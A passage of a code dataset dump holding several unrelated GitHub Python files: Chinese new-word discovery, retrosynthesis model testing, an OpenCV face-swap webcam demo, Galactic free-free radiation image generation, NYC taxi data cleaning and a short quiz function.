gitlab_client)\n","repo_name":"inmanta/terraform","sub_path":"tests/providers/gitlab/test_gitlab_project.py","file_name":"test_gitlab_project.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} {"seq_id":"29797073009","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Mar 12 13:25:07 2017\r\n\r\n@author: YoungHao\r\n\"\"\"\r\n\r\nimport math\r\nimport pickle\r\n\r\ncorpus_list = []\r\ncorpus = ''\r\nreverse_corpus = ''\r\nwordDic = {}\r\nreverse_wordDic = {} # built from the reversed corpus, used for left-neighbor entropy\r\nright_word_entropy = {}\r\nleft_word_entropy = {}\r\nprobability_word = {}\r\nconcreation_word = {}\r\nscore = {}\r\n#stop_symbol = '(),.。!,ゅ\\'~~`·?-=:、;[]{}*&^%$#@!~+_=-!@#¥%……&*()——+}{【】||?。><!,;.1234567890:“”\"》《+?/%)(@ \\n \\t \\u3000'\r\n\r\ni = 0 # line counter (was used below before being assigned)\r\nfor lines in open(\"红楼梦.txt\", encoding = 'utf-8'):\r\n    corpus_list.append(lines)\r\n    i = i + 1\r\n    if(i % 2000 == 0):\r\n        print(i)\r\n    \r\ncorpus = ''.join(corpus_list) # collect strings in a list and merge with join(); faster than \"+\"\r\nreverse_corpus = corpus[::-1]\r\nprint(len(corpus))\r\nprint(len(reverse_corpus))\r\ndef dictionary(w): # w: max word length; builds the candidate-word dictionary\r\n    end = int(len(corpus)) # corpus length\r\n    for f in range(w):\r\n        j = f + 1\r\n        i = 0\r\n        flag = 0\r\n        while( j < end ):\r\n            word = str(corpus[i:j])\r\n           # for s in stop_symbol:\r\n            #    if s in word:\r\n             #       flag = 1\r\n            if flag == 0:\r\n                if word.strip() not in wordDic:\r\n                    try:\r\n                        wordDic[word] = 1\r\n                    except Exception:\r\n                        continue\r\n                else:\r\n                    try:\r\n                        wordDic[word] += 1\r\n                    except Exception:\r\n                        continue\r\n            i += 1\r\n            j += 1\r\n            flag = 0\r\n    end = int(len(reverse_corpus)) # reversed-corpus length\r\n    for f in range(w):\r\n        j = f + 1\r\n        i = 0\r\n        flag = 0\r\n        while( j < end ):\r\n            word = str(reverse_corpus[i:j])\r\n#            for s in stop_symbol:\r\n#                if s in word:\r\n#                    flag = 1\r\n            if flag == 0:\r\n                if word.strip() not in reverse_wordDic:\r\n                    try:\r\n                        reverse_wordDic[word] = 1\r\n                    except Exception:\r\n                        continue \r\n                else:\r\n                    try:\r\n                        reverse_wordDic[word] += 1\r\n                    except Exception:\r\n                        continue \r\n            i += 1\r\n            j += 1\r\n            flag = 0\r\ndef entropy(): \r\n    # first compute the right-neighbor entropy\r\n    sorted_WordDic = sorted(wordDic) # for right-neighbor entropy\r\n    i = 0\r\n    length_wordDic = len(sorted_WordDic)\r\n    while (i < length_wordDic):\r\n        word = sorted_WordDic[i] # target word\r\n        j = i + 1\r\n        if ( j >= length_wordDic):\r\n            break\r\n        buffer = {} # right neighbors and their counts \r\n        while (word in sorted_WordDic[j]):\r\n            label = sorted_WordDic[j][len(word)]\r\n            if label not in buffer:\r\n                buffer[label] = wordDic[sorted_WordDic[j]] # count each right neighbor only once \r\n            j += 1\r\n            if ( j >= length_wordDic):\r\n                break\r\n        sum = 0.000000001\r\n        pro_buffer = {}\r\n        for buff in buffer:\r\n            sum = sum + buffer[buff]\r\n        for buff in buffer:\r\n            pro_buffer[buff] = buffer[buff] / sum\r\n        right_entropy = 0.0\r\n        for pro in pro_buffer:\r\n            right_entropy = right_entropy - pro_buffer[pro] * math.log(pro_buffer[pro])\r\n        right_word_entropy[word] = right_entropy # store the right-neighbor entropy\r\n        i += 1\r\n        \r\n    # then compute the left-neighbor entropy\r\n    left_sorted_WordDic = sorted(reverse_wordDic) # for left-neighbor entropy\r\n    i = 0\r\n    length_wordDic = len(left_sorted_WordDic) \r\n    while (i < length_wordDic):\r\n        word = left_sorted_WordDic[i] # target word\r\n        j = i + 1\r\n        if ( j >= length_wordDic):\r\n            break\r\n        buffer = {} # left neighbors and their counts \r\n        while (word in left_sorted_WordDic[j]):\r\n            label = left_sorted_WordDic[j][len(word)]\r\n            if label not in buffer:\r\n                buffer[label] = reverse_wordDic[left_sorted_WordDic[j]] # count each left neighbor only once \r\n            j += 1\r\n            if ( j >= length_wordDic):\r\n                break\r\n        sum = 0.000000001\r\n        pro_buffer = {}\r\n
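        # Shannon entropy of the neighbor distribution: H = -sum(p * log(p))\r\n        for buff in buffer:\r\n            sum = sum + 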
buffer[buff]\r\n        for buff in buffer:\r\n            pro_buffer[buff] = buffer[buff] / sum\r\n        left_entropy = 0.0\r\n        for pro in pro_buffer:\r\n            left_entropy = left_entropy - pro_buffer[pro] * math.log(pro_buffer[pro])\r\n        words = word[::-1]\r\n        left_word_entropy[words] = left_entropy # store the left-neighbor entropy \r\n        i += 1\r\ndef concreation(): # compute the internal cohesion of complete words\r\n    sum = 0.0\r\n    for i in wordDic:\r\n        sum = sum + wordDic[i]\r\n    for i in wordDic:\r\n        probability_word[i] = wordDic[i] / sum\r\n    for i in wordDic:\r\n        length = len(i)\r\n        if length > 1:\r\n            j = 1\r\n            p = 9999999999\r\n            while (j < length):\r\n                right = i[0:j]\r\n                left = i[j:length]\r\n                k = probability_word[i] / (probability_word[right] * probability_word[left])\r\n                if (p > k):\r\n                    p = k\r\n                j += 1\r\n            concreation_word[i] = p\r\ndef word_generation(left_entropy, right_entropy, concreation):\r\n    for word in wordDic:\r\n        if ((len(word)) > 1 and (word in left_word_entropy) and (word in right_word_entropy) and (word in concreation_word)):\r\n            if ((left_word_entropy[word] >= left_entropy) and (right_word_entropy[word] >= right_entropy) and (concreation_word[word] >= concreation)):\r\n                print(word)\r\n                score[word] = concreation_word[word] / left_word_entropy[word] / right_word_entropy[word]\r\n\r\ndictionary(5) # words up to five characters long; tunable\r\nentropy() # compute left/right neighbor entropy\r\nconcreation() # compute internal cohesion\r\nword_generation(0.2, 0.2, 300) # thresholds can be adjusted\r\n\r\ndef score2pickle():\r\n    with open('score_word.pickle', 'wb') as f:\r\n        pickle.dump(score, f)\r\n    print('success')\r\n\r\nscore2pickle()\r\n\r\n\r\n","repo_name":"Chihuataneo/ChineseWordSegment","sub_path":"ChineseWordFound.py","file_name":"ChineseWordFound.py","file_ext":"py","file_size_in_byte":6486,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} {"seq_id":"33870550766","text":"import os\nimport numpy as np\nimport torch\nimport math\nimport json\nimport argparse\n\nfrom rdkit import Chem\nfrom tqdm import tqdm\nfrom gln.common.cmd_args import cmd_args\nfrom gln.common.consts import DEVICE\nfrom gln.test.model_inference import RetroGLN\n\n\ndef get_dataset(phase):\n    file_name = \"%s_dataset.json\" %phase\n    products_list = []\n    reactants_list = []\n    retro_reaction_set = set()\n    with open(file_name, 'r') as f:\n        dataset = json.load(f)\n    for _, reaction_trees in dataset.items():\n        max_num_materials = 0\n        final_retro_routes_list = None\n        for i in range(1, int(reaction_trees['num_reaction_trees'])+1):\n            if len(reaction_trees[str(i)]['materials']) > max_num_materials:\n                max_num_materials = len(reaction_trees[str(i)]['materials'])\n                final_retro_routes_list = reaction_trees[str(i)]['retro_routes']\n\n        for retro_route in final_retro_routes_list:\n            for retro_reaction in retro_route:\n                if retro_reaction not in retro_reaction_set:\n                    retro_reaction_set.add(retro_reaction)\n                    products_list.append(retro_reaction.split('>>')[0])\n                    reactants_list.append(retro_reaction.split('>>')[1])\n\n    return products_list, reactants_list\n\n\ndef cano_smiles(smiles):\n    try:\n        tmp = Chem.MolFromSmiles(smiles)\n        if tmp is None:\n            return None, smiles\n        tmp = Chem.RemoveHs(tmp)\n        if tmp is None:\n            return None, smiles\n        [a.ClearProp('molAtomMapNumber') for a in tmp.GetAtoms()]\n        return tmp, Chem.MolToSmiles(tmp)\n    except:\n        return None, smiles\n\n\ndef get_inference_answer(smiles, beam_size):\n    pred_struct = model.run(smiles, 5*beam_size, 5*beam_size, rxn_type='UNK')\n    if pred_struct is None:\n        return []\n    reactants_list = pred_struct['reactants']\n    scores_list = pred_struct['scores']\n    answer = []\n    aim_size = beam_size\n
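    # keep at most beam_size predictions whose reactant SMILES all parse\n    for i in 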
range(len(reactants_list)):\n if aim_size == 0:\n break\n reactants = reactants_list[i].split('.')\n score = scores_list[i]\n num_valid_reactant = 0\n sms = set()\n for r in reactants:\n m = Chem.MolFromSmiles(r)\n if m is not None:\n num_valid_reactant += 1\n sms.add(Chem.MolToSmiles(m))\n if num_valid_reactant != len(reactants):\n continue\n if len(sms):\n try:\n answer.append([sorted(list(sms)), -math.log10(score)])\n except:\n answer.append([sorted(list(sms)), -math.log10(score+1e-10)])\n aim_size -= 1\n\n return answer\n\n\ndef get_prediction_result(task):\n product, ground_truth_reactants = task\n ground_truth_keys = set([Chem.MolToInchiKey(Chem.MolFromSmiles(reactant))[:14] for reactant in ground_truth_reactants.split('.')]) \n for rank, solution in enumerate(get_inference_answer(product, local_args.beam_size)):\n flag = False\n predict_reactants, _ = solution[0], solution[1]\n answer_keys = set([Chem.MolToInchiKey(Chem.MolFromSmiles(reactant))[:14] for reactant in predict_reactants])\n if answer_keys == ground_truth_keys:\n return rank\n if flag: break\n return None\n\n\nif __name__ == \"__main__\":\n cmd_opt = argparse.ArgumentParser(description='Argparser for valid test')\n cmd_opt.add_argument('-epoch_for_test', default=100, type=int, help='model for test')\n cmd_opt.add_argument(\"-beam_size\", help=\"beam size\", type=int, default=10)\n local_args, _ = cmd_opt.parse_known_args()\n\n torch.manual_seed(42)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(42)\n np.random.seed(42)\n\n model_dump = os.path.join(cmd_args.save_dir, 'model-%d.dump' % local_args.epoch_for_test)\n model = RetroGLN(model_dump)\n model.gln.to(DEVICE)\n\n overall_result = np.zeros((local_args.beam_size, 2))\n test_products_list, test_reactants_list = get_dataset('test')\n tasks = []\n for epoch in range(0, len(test_products_list)):\n ground_truth_reactants = test_reactants_list[epoch]\n product = test_products_list[epoch]\n product = Chem.MolToSmiles(Chem.MolFromSmiles(product))\n _, product = cano_smiles(product)\n tasks.append((product, ground_truth_reactants))\n for task in tqdm(tasks):\n rank = get_prediction_result(task)\n overall_result[:, 1] += 1\n if rank is not None:\n overall_result[rank:, 0] += 1\n\n print(\"overall_result: \", overall_result, 100 * overall_result[:, 0] / overall_result[:, 1])\n","repo_name":"SongtaoLiu0823/FusionRetro","sub_path":"GLN/gln/retrosynthesis_test.py","file_name":"retrosynthesis_test.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"33907161670","text":"import cv2\nimport numpy as np\nimport dlib\nimport math\n\ndef correctColours(im1, im2, points):\n \n blurAmount = 0.5 * np.linalg.norm(np.array(points)[38] - np.array(points)[43])\n blurAmount = int(blurAmount)\n\n if blurAmount % 2 == 0:\n blurAmount += 1\n \n im1Blur = cv2.blur(im1, (blurAmount, blurAmount), 0)\n im2Blur = cv2.blur(im2, (blurAmount, blurAmount), 0)\n \n # Avoid divide-by-zero errors.\n im2Blur += (2 * (im2Blur <= 1)).astype(im2Blur.dtype)\n \n ret = np.uint8((im2.astype(np.float32) * im1Blur.astype(np.float32) /\n im2Blur.astype(np.float32)).clip(0,255))\n return ret\n\ndef warpTriangle(img1, img2, tri1, tri2) :\n\n # Find bounding rectangle for each triangle\n r1 = cv2.boundingRect(tri1)\n r2 = cv2.boundingRect(tri2)\n\n # Crop input image\n img1Cropped = img1[r1[1]:r1[1] + r1[3], r1[0]:r1[0] + r1[2]]\n\n # Offset points by left top corner of the respective rectangles\n tri1Cropped = 
[]\n tri2Cropped = []\n\n for i in range(0, 3):\n tri1Cropped.append(((tri1[0][i][0] - r1[0]),(tri1[0][i][1] - r1[1])))\n tri2Cropped.append(((tri2[0][i][0] - r2[0]),(tri2[0][i][1] - r2[1])))\n\n # Given a pair of triangles, find the affine transform.\n warpMat = cv2.getAffineTransform( np.float32(tri1Cropped), np.float32(tri2Cropped) )\n\n # Apply the Affine Transform just found to the src image\n img2Cropped = cv2.warpAffine( img1Cropped, warpMat, (r2[2], r2[3]), None, flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101 )\n\n # Get mask by filling triangle\n mask = np.zeros((r2[3], r2[2], 3), dtype = np.float32)\n cv2.fillConvexPoly(mask, np.int32(tri2Cropped), (1.0, 1.0, 1.0), 16, 0)\n\n img2Cropped = img2Cropped * mask\n\n # Copy triangular region of the rectangular patch to the output image\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] * ( (1.0, 1.0, 1.0) - mask )\n\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] + img2Cropped\n\ndef landmarks_to_points(landmarks):\n points = []\n for i in range(len(landmarks.parts())):\n points.append((int(landmarks.part(i).x),int(landmarks.part(i).y)))\n\n return points\n\nsrc_image = cv2.imread(\"../data/images/Devansh01.jpg\")\n\nsrc_image = cv2.resize(src_image,(640,480),interpolation= cv2.INTER_LINEAR)\n\nface_detector = dlib.get_frontal_face_detector()\nlandmark_detector_path = \"../data/models/shape_predictor_68_face_landmarks.dat\"\n\nlandmark_detector = dlib.shape_predictor(landmark_detector_path)\n\nsrc_image_rgb = cv2.cvtColor(src_image,cv2.COLOR_BGR2RGB)\nface_rects_src = face_detector(src_image_rgb,0)\n\nnew_rect_src = dlib.rectangle(int(face_rects_src[0].left()),\n int(face_rects_src[0].top()),\n int(face_rects_src[0].right()),\n int(face_rects_src[0].bottom()))\n\nlandmarks_src = landmark_detector(src_image_rgb,new_rect_src)\n\npoints_src = landmarks_to_points(landmarks_src)\n\nindexes_src = cv2.convexHull(np.array(points_src),returnPoints = False)\nadd_points_src = [[48],[49],[50],[51],[52],[53],[54],[55],[56],[57],[58]]\ncombined_indexes_src = np.vstack([np.array(indexes_src),np.array(add_points_src)])\nhull1 = []\nfor i in range(len(combined_indexes_src)):\n hull1.append(points_src[combined_indexes_src[i,0]])\n\nrect = (0,0,src_image.shape[1],src_image.shape[0])\nsubdiv = cv2.Subdiv2D(rect)\n\nfor p in hull1:\n subdiv.insert(p)\n\nindexes_src_hull1 = []\ntriangle_list = subdiv.getTriangleList()\nfor tri in triangle_list:\n pt1 = (tri[0],tri[1])\n pt2 = (tri[2],tri[3])\n pt3 = (tri[4],tri[5])\n\n pt1_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt1))**2).sum(axis = 1)),axis = 0)\n pt2_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt2))**2).sum(axis = 1)),axis = 0)\n pt3_index = np.argmin(np.sqrt(((np.float32(hull1) - np.float32(pt3))**2).sum(axis = 1)),axis = 0)\n\n indexes_src_hull1.append((pt1_index,pt2_index,pt3_index))\n\ncap = cv2.VideoCapture(0)\nfirst_frame = True\nwhile cap.isOpened():\n\n ret ,dst_image = cap.read()\n\n if not ret:\n break\n\n dst_image_rgb = cv2.cvtColor(dst_image,cv2.COLOR_BGR2RGB)\n face_rects_dst = face_detector(dst_image_rgb,0)\n\n if len(face_rects_dst) == 0:\n continue\n new_rect_dst = dlib.rectangle(int(face_rects_dst[0].left()),\n int(face_rects_dst[0].top()),\n int(face_rects_dst[0].right()),\n int(face_rects_dst[0].bottom()))\n\n landmarks_dst = landmark_detector(dst_image_rgb,new_rect_dst)\n\n points_dst = landmarks_to_points(landmarks_dst)\n\n hull2 = []\n for i in 
range(len(combined_indexes_src)):\n hull2.append(points_dst[combined_indexes_src[i,0]])\n\n if first_frame:\n prev_frame_gray = cv2.cvtColor(dst_image_rgb,cv2.COLOR_BGR2GRAY)\n prev_hull = hull2\n first_frame = False\n \n frame_gray = cv2.cvtColor(dst_image_rgb,cv2.COLOR_RGB2GRAY)\n lk_params = dict( winSize = (101,101),maxLevel = 15,criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 20, 0.001))\n hull2Next, st , err = cv2.calcOpticalFlowPyrLK(prev_frame_gray,frame_gray,np.array(prev_hull,np.float32), np.array(hull2,np.float32),**lk_params)\n\n if (len(hull1) > len(hull2)) or len(hull2)!=len(hull2Next):\n continue\n\n\n for k in range(0,len(hull2)):\n d = cv2.norm(np.array(hull2[k]) - hull2Next[k])\n alpha = math.exp(-d*d/400)\n hull2[k] = (1 - alpha) * np.array(hull2[k]) + alpha * hull2Next[k]\n\n \n dst_image_copy1 = dst_image.copy()\n for idxs in indexes_src_hull1:\n tri_in = []\n tri_out = []\n for idx in idxs:\n tri_in.append(hull1[idx])\n tri_out.append(hull2[idx])\n tri_in = np.float32(tri_in).reshape(1,3,2)\n tri_out = np.float32(tri_out).reshape(1,3,2)\n warpTriangle(src_image,dst_image_copy1, tri_in, tri_out)\n\n output = correctColours(src_image, dst_image_copy1, points_dst)\n\n # Create a Mask around the face\n re = cv2.boundingRect(np.array(hull2,np.float32))\n centerx = (re[0]+(re[0]+re[2]))/2\n centery = (re[1]+(re[1]+re[3]))/2\n\n hull3 = []\n for i in range(0,len(hull2)-len(add_points_src)):\n # Take the points just inside of the convex hull\n hull3.append((0.95*(hull2[i][0] - centerx) + centerx, 0.95*(hull2[i][1] - centery) + centery))\n\n mask1 = np.zeros((dst_image.shape[0], dst_image.shape[1],3), dtype=np.float32)\n hull3Arr = np.array(hull3,np.int32)\n\n cv2.fillConvexPoly(mask1,hull3Arr,(255.0,255.0,255.0),16,0)\n\n # Blur the mask before blending\n mask1 = cv2.GaussianBlur(mask1,(51,51),10)\n\n mask2 = (255.0,255.0,255.0) - mask1\n\n # cv2.imshow(\"mask1\", np.uint8(mask1))\n # cv2.imshow(\"mask2\", np.uint8(mask2))\n\n # Perform alpha blending of the two images\n temp1 = np.multiply(output,(mask1*(1.0/255)))\n temp2 = np.multiply(dst_image,(mask2*(1.0/255)))\n result = temp1 + temp2\n\n cv2.imshow(\"temp1\", np.uint8(temp1))\n cv2.imshow(\"temp2\", np.uint8(temp2))\n\n result = np.uint8(result)\n\n prev_frame_gray = frame_gray.copy()\n prev_hull = hull2\n\n cv2.imshow(\"After Blending\", result)\n if cv2.waitKey(1) == ord('q'):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n \n\n \n\n \n\n\n\n\n\n\n","repo_name":"jashdalvi/Advanced-Computer-Vision","sub_path":"ScriptFiles/face_swap_video.py","file_name":"face_swap_video.py","file_ext":"py","file_size_in_byte":7316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"17339184899","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Make image of Galactic *free-free* radiation at given frequency.\n#\n# The re-combination line of H (especially Halpha line) traces the\n# Galactic free-free radiation (Smoot 1998; Reynold & Haffner 2000).\n# Finkbeiner (2003) provided the brightness map of Halpha (I_Halpha),\n# and the Galactic free-free radiation at 30 GHz can be calculated as:\n# T^{Gff}_{30GHz}(r) = 7.4e-6 * ( I_Halpha(r) / Rayleigh ) (K)\n# where: 1 Rayleigh = 1e6 / (4*pi) photons/s/cm^2/sr\n#\n# The spectrum of Galactic free-free radiation can be generally described\n# by a broken-powerlaw model, with a spectral index \\alpha = 2.10 when\n# frequency \\nu <= 10 GHz (Shaver et al. 
1999), and index \\alpha = 2.15\n# when \\nu > 10 GHz (Bennett et al. 2003).\n# T^{Gff}_{\\nu}(r) \\proto \\nu^{- \\alpha}\n# => T^{Gff}_{\\nu}(r) = T^{Gff}_{30GHz} * (\\nu / 30GHz)^{- \\alpha}\n#\n# XXX:\n# * unit of input Halpha image: Rayleigh? or K?\n#\n# Aaron LI \n# 2015/03/26\n#\n# ChangeLogs:\n# 2015/03/30, Aaron LI\n# * Add header keywords \"FREQ\" & \"COMP\"\n# 2015/03/28, Aaron LI\n# * update author name\n# * replace for loops with numpy array manipulation in the output image\n# calculation, which greatly improve the calculate speed.\n#\n\nfrom astropy.io import fits\nimport numpy as np\n\nimport os\nimport sys\nimport getopt\nimport datetime\n\n\n# Spectral indexes of Galactic free-free radiation:\nindex_10ghz_above = 2.15 # If frequency is above 10 GHz\nindex_10ghz_below = 2.10 # If frequency is below 10 GHz\n\n\nUSAGE = \"\"\"Usage:\n %(prog)s [ -h -C -v ] -f freq_MHz -i Halpha_img -o outfile\n\nRequired arguments:\n -f, --freq\n frequency (MHz) at which the radiation image to be made\n -i, --infile\n H_alpha image which used as the calculation template\n -o, --outfile\n output FITS file of the radiation image at given frequency\n\nOptional arguments:\n -h, --help\n print this usage\n -C, --clobber\n overwrite output file if already exists\n -v, --verbose\n show verbose information\n\"\"\" % { 'prog': os.path.basename(sys.argv[0]) }\n\n\ndef mkfits_galff(freq, infile, verbose=False):\n \"\"\"\n Return FITS of Galactic free-free image at given frequency,\n with header copyed from the input file.\n \"\"\"\n if verbose:\n print(\"Openning %s ...\" % infile)\n halpha_fits = fits.open(infile)\n # convert data type to \"float64\"\n halpha_data = halpha_fits[0].data.astype(np.float64)\n # calculate outfile data\n if verbose:\n print(\"Calculating output image data ...\")\n T_gff_30ghz = 7.4e-6 * halpha_data # unit: K\n if freq >= 10000:\n # freq >= 10 GHz: one single power law is sufficient\n out_data = T_gff_30ghz * np.power(freq/30000, -index_10ghz_above)\n else:\n # freq < 10 GHz: requires broken power law\n T_gff_10ghz = T_gff_30ghz * np.power(10000/30000, -index_10ghz_above)\n out_data = T_gff_10ghz * np.power(freq/10000, -index_10ghz_below)\n # Copy the header of infile to outfile\n out_header = halpha_fits[0].header.copy(strip=True)\n # Remove some unwanted keywords from header\n for key in [\"CONTENT\", \"HDUNAME\"]:\n if key in out_header:\n del out_header[key]\n # Add meta information of the new fits to header\n out_header.set(\"FREQ\", freq, \"MHz\")\n out_header.set(\"COMP\", \"Galactic_free-free\", \"Radiation component\")\n # close fits file\n halpha_fits.close()\n # create the FITS object including the image data and header\n out_fits = fits.PrimaryHDU(data=out_data, header=out_header)\n return out_fits\n\n\ndef mkcards_hist(cmd_list):\n \"\"\"\n Return a list of HISTORY Card, which record the tool and parameters\n used in this process.\n \"\"\"\n tool_card = fits.Card(\"HISTORY\",\n \"TOOL: %(tool)s (%(time)s)\" % {\n 'tool': cmd_list[0],\n 'time': datetime.datetime.today().strftime(\"%Y-%m-%dT%H:%M:%S\") },\n \"by Weitian LI (c) 2015\")\n parm = \"PARM: \" + \" \".join(cmd_list[1:])\n parm_card = fits.Card(\"HISTORY\", parm)\n return [tool_card, parm_card]\n\n\ndef usage():\n print(USAGE)\n\n\ndef main():\n \"\"\"\n Process command line arguments, and calculate output image,\n update header history, and write to file.\n \"\"\"\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"Cf:hi:o:v\",\n [\"clobber\", \"freq=\", \"help\", \"infile=\",\n \"outfile=\", 
\"verbose\"])\n except getopt.GetoptError as err:\n print(err)\n usage()\n sys.exit(2)\n verbose = False\n clobber = False\n # Records this tool and its options/arguments,\n # and used to write history into FITS header.\n cmd_list = [ os.path.basename(sys.argv[0]) ]\n for opt, arg in opts:\n if opt in (\"-v\", \"--verbose\"):\n verbose = True\n cmd_list.append(\"--verbose\")\n elif opt in (\"-h\", \"--help\"):\n usage()\n sys.exit()\n elif opt in (\"-C\", \"--clobber\"):\n clobber = True\n cmd_list.append(\"--clobber\")\n elif opt in (\"-f\", \"--freq\"):\n freq = float(arg)\n assert (freq > 0), \"Specified frequency = %f <= 0!\" % freq\n cmd_list.append(\"--freq=%s\" % freq)\n elif opt in (\"-i\", \"--infile\"):\n infile = arg\n cmd_list.append(\"--infile=%s\" % infile)\n elif opt in (\"-o\", \"--outfile\"):\n outfile = arg\n cmd_list.append(\"--outfile=%s\" % outfile)\n else:\n assert False, \"unhandled option\"\n\n if verbose:\n print(\"freq = %s MHz\" % freq)\n print(\"infile = %s\" % infile)\n print(\"outfile = %s\" % outfile)\n print(\"clobber = %s\" % clobber)\n\n # Create the FITS object for the radiation image\n out_fits = mkfits_galff(freq=freq, infile=infile, verbose=verbose)\n\n # Update fits header to record this tool and parameters.\n hist_cards = mkcards_hist(cmd_list)\n out_fits.header.extend(hist_cards)\n\n # Write FITS object into output file.\n if verbose:\n print(\"Writing data to %s ...\" % outfile)\n out_fits.writeto(outfile, clobber=clobber, checksum=True)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"liweitianux/radio-fg-simu-tools","sub_path":"scripts/mkimg_galff_freq.py","file_name":"mkimg_galff_freq.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"27467314506","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns \nimport sklearn\nimport sys, os\nfrom sklearn import preprocessing\n\n#import pandas_profiling as pandas_profiling\nplt.style.use('seaborn-whitegrid')\n\n\ndef readInTaxi():\n \"\"\"\n read in and clean dataset \n return: df_train, df_test [pd.DataFrame]\n \"\"\"\n df = pd.read_csv('../NYC_taxi/train_small.csv', nrows=50000, \n parse_dates=[\"pickup_datetime\"])\n \n \n print('read in dataset -- training: ', df.shape)\n \n ## ==== step 1: missing values==================================\n df.dropna(how='any', axis='rows', inplace=True)\n\n \n \n ## === step 2: negative fareamount, constrained coordinates\n mask = (df['fare_amount'] > 0)\n df = df[mask]\n \n boxes = {'longitude': (-75, -73), 'latitude': (40, 42)}\n mask = (df['pickup_longitude'] >= boxes['longitude'][0]) & \\\n (df['pickup_longitude'] <= boxes['longitude'][1]) & \\\n (df['dropoff_longitude'] >= boxes['longitude'][0]) & \\\n (df['dropoff_longitude'] <= boxes['longitude'][1]) & \\\n (df['pickup_latitude'] >= boxes['latitude'][0]) & \\\n (df['pickup_latitude'] <= boxes['latitude'][1]) & \\\n (df['dropoff_latitude'] >= boxes['latitude'][0]) & \\\n (df['dropoff_latitude'] <= boxes['latitude'][1])\n\n df = df[mask]\n print('*'*77)\n print('after drop dummies -- training: ', df.shape)\n\n return df\n\n\ndef distance(row):\n lat1 = row['dropoff_latitude']\n lat2 = row['pickup_latitude']\n lon1 = row['dropoff_longitude']\n lon2 = row['pickup_longitude']\n \n ## haversine formula https://en.wikipedia.org/wiki/Haversine_formula\n R = 6371\n dLat = np.pi/180 * (lat2 - lat1)\n dLon = 
np.pi/180 * (lon2 - lon1)\n    a = np.sin(dLat/2)**2 + np.cos(np.pi/180*lat1) * np.cos(np.pi/180*lat2) * np.sin(dLon/2)**2\n    c = 2 * np.arctan(np.sqrt(a)/np.sqrt(1-a))\n    return R * c\n\ndef distance_to_poi(row, poi):\n    lat1 = row['pickup_latitude']\n    lon1 = row['pickup_longitude']\n    lon2 = poi[0]\n    lat2 = poi[1]\n    R = 6371\n    dLat = np.pi/180 * (lat2 - lat1)\n    dLon = np.pi/180 * (lon2 - lon1)\n    a = np.sin(dLat/2)**2 + np.cos(np.pi/180*lat1) * np.cos(np.pi/180*lat2) * np.sin(dLon/2)**2\n    c = 2 * np.arctan(np.sqrt(a)/np.sqrt(1-a))\n    return R * c\n\ndef feature_engineer(df):\n    ## ==== step 1: calculate the point distance from pickup to dropoff=============\n    df['distance'] = df.apply(distance, axis=1)\n    \n    ## ==== step 2: calculate the point distance to landmarks=============\n    poi = {'nyc': (-74.006389, 40.714167),\n           'jfk': (-73.782223, 40.644167),\n           'ewr': (-74.175, 40.689722),\n           'lga': (-73.87194, 40.774722)}\n    \n    \n    for i in poi.keys():\n        df['dist_to_{}'.format(i)] = df.apply(lambda x: distance_to_poi(x, poi[i]), axis=1)\n\n    ## ==== step 3: clean the timestamp\n    df['hour'] = df['pickup_datetime'].dt.hour\n    df['day_of_week'] = df['pickup_datetime'].dt.dayofweek\n    df['month'] = df['pickup_datetime'].dt.month\n    df['year'] = df['pickup_datetime'].dt.year\n    \n    features = ['fare_amount', 'pickup_longitude',\n       'pickup_latitude', 'dropoff_longitude', 'dropoff_latitude',\n       'passenger_count', 'hour', 'day_of_week', 'month', 'year', 'distance',\n       'dist_to_nyc', 'dist_to_jfk', 'dist_to_ewr', 'dist_to_lga']\n    \n    print('*'*77)\n    print('after feature engineering -- training: ', df.shape)\n    \n    return df[features]\n","repo_name":"Yingru/NYC_taxi","sub_path":"src/readInData.py","file_name":"readInData.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"71161486920","text":"def f(s):\n    return 'a' in s\n\ndef satisfiesF(L):\n    \"\"\"\n    Assumes L is a list of strings\n    Assume function f is already defined for you and it maps a string to a Boolean\n    Mutates L such that it contains all of the strings, s, originally in L such\n    that f(s) returns True, and no other elements. Remaining elements in L\n    should be in the same order.\n    Returns the length of L after mutation\n    \"\"\"\n    newList = [] #this will contain all the True elements\n    for i in range(len(L)):\n        if f(L[i]): #so go through each item, if it is true\n            newList.append(L[i]) #add it to the new list\n    L[:] = newList #convert L to the new list\n    return len(L) #return the length of it\nrun_satisfiesF(L, satisfiesF)\n","repo_name":"reysu/Python-Practice","sub_path":"Quiz/satisfies.py","file_name":"satisfies.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} {"seq_id":"8167021881","text":"user_input = input(\"Enter your integers separated by spaces: \")\n\n# Splitting the input string into a list of elements\nuser_list = user_input.split()\n# This uses the default behavior of split() without specifying any delimiter:\n# it treats consecutive whitespace (including spaces, tabs, 